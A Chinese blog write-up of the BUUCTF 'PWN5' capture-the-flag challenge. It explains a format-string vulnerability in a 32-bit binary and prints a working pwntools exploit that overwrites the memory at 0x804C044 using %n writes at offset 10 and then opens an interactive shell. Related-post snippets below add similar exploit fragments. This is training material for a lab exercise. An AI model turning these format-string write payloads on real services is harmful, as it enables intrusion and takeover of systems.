BUUCTF [第五空间2019 决赛]PWN5

最新推荐文章于 2024-04-01 09:29:25 发布
最新推荐文章于 2024-04-01 09:29:25 发布
阅读量205 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54262894/article/details/121000306
版权

 

先checksec,开启了NX保护和Canary保护

也就意味着不能用栈溢出来攻击了

 

运行一下

 

放入ida中

查看main函数

 

我们可以看到只要令atoi(nptr) == dword_804C044就可以拿到权限

但dword_804C044是随机的,所以我们需要将它修改为我们想要的数据

看到了printf(buf);  说明存在格式化字符串漏洞

先计算偏移

我们可以算出偏移为10(从AAAA到41414141)

 

再看这个函数的长度 44~47 共4个字节

所以我们就可以用%10$n%11$n%12$n%13$n来修改该函数的内容

这里的10跟上面计算出的偏移量有关

关于偏移量的计算我是从这里学的

点这里~

写payload

from pwn import*

p = remote('node4.buuoj.cn',28543)
#p = process("./note")
#binsh = "/bin/sh"

addr_dword_804C044 = 0x0804C044
addr_dword_804C045 = 0x0804C045
addr_dword_804C046 = 0x0804C046
addr_dword_804C047 = 0x0804C047
payload =p32(addr_dword_804C044)+p32(addr_dword_804C045)+p32(addr_dword_804C046)+p32(addr_dword_804C047)+'%10$n%11$n%12$n%13$n'
p.sendline(payload)
p.sendline(str(0x10101010))
p.interactive()

至于这里为什么非得是0x10101010而不能用其他数据,我也暂时没搞懂

其他的博主也没有明确的解释,只能暂时放着了

运行payload

 

 

拿到flag!

不会解pwn的泽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4221
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
[CTF][第五空间2019 决赛]PWN5 1
凉水的博客
12-09 1092
解题思路 反编译后的源码: srand(__seed); // 生成随机数 iVar1 = open("/dev/urandom",0); read(iVar1,&DAT_0804c044,4); printf("your name:"); // 读取输入 read(0,local_78,99); printf("Hello,"); // 打印输入 printf(local_78); printf("your passwd:"); read(0,loc
buuctf——[第五空间2019 决赛]PWN51 利用格式化字符串漏
2301_81505831的博客
03-15 371
首先,我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量:可以数出0x41414141是格式化字符串的第10个参数,之后只要修改dword_804c044的值,让输入和dword_804c044的值一样就可以了。打开靶机,下载文件,检查文件类型,可以看到是32位程序,开启了Canary保护,不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后,附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。
[第五空间2019 决赛]PWN51解题
2301_81504456的博客
03-11 505
主要格式化字符串漏洞利用,后面添加recvline及脚本编写说明仅为个人理解🌹🌹🌹(个人还是小白一枚)希望帮助理解,望大家多多指出错误及正确理解做法。
[BUUCTF]-PWN:[第五空间2019 决赛]PWN5解析
2301_79326813的博客
12-14 299
这里之所以能这样利用是利用了动态链接的延迟绑定,当函数第一次调用时会把该函数真正的地址写入got表内,之后的调用都会从got表内存的地址去调用,大致是plt->got->addr,atoi的plt表里存的是atoi的got地址,atoi的got里存的是atoi在程序中的真正地址,我们修改atoi的got的内容,那他在调用atoi的plt时就会直接调用system的plt,system的plt就会调用system的got,从而实现调用system函数。这里有大致有两种思路,都运用了格式化字符串漏洞。
[第五空间2019 决赛]PWN5
qq_53928256的博客
10-07 226
由于输入四个地址,对应输出16个字节,也就是将每个地址(即0x804C044~0x804C047)的内容修改为。由于我们将这四个地址(即0x804C044~0x804C047)存储的内容均修改为0x10,所以变量。偏移量为10,所以我们只需要对第10个到第13个参数对应的内容的地址进行修改即可;所以我们可以通过格式化字符串漏洞的任意地址修改更改地址。被存储到了第10个栈参数的位置,所以对应的偏移为10。然后将这4个地址对应的存储位置,通过。将对应地址内容修改为输出的字符个数;读出的4个字节的内容即为。
buuctf之[第五空间2019 决赛]PWN5
最新发布
weixin_54452942的博客
04-01 568
简单易懂~
BUUCTF--第五空间决赛pwn5
sandyyyz的博客
10-13 397
给和我一样的pwn新手参考的一次简单的格式化字符串漏洞题解析过程
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 352
Buu CTF PWN第五空间2019 决赛]PWN5的WriteUp
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
首届数字空间安全攻防大赛
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 380
buuctf-pwn 001-016题wp
[第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量
Dem1的博客
04-09 792
正经wp from pwn import* p=remote("node4.buuoj.cn",29506) bssaddr = 0x804c044 #binaddr = 0x0804932F #1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x' ## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78
BUUCTF - PWNPWN5
古月浪子的博客
03-27 473
checksec一下 IDA打开看看,发现格式化字符串漏洞 那么思路很简单,先找偏移,然后通过格式化字符串漏洞任意地址写来更改unk_804c044的值 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambd...
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 212
buuctf-pwn 039~046题
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值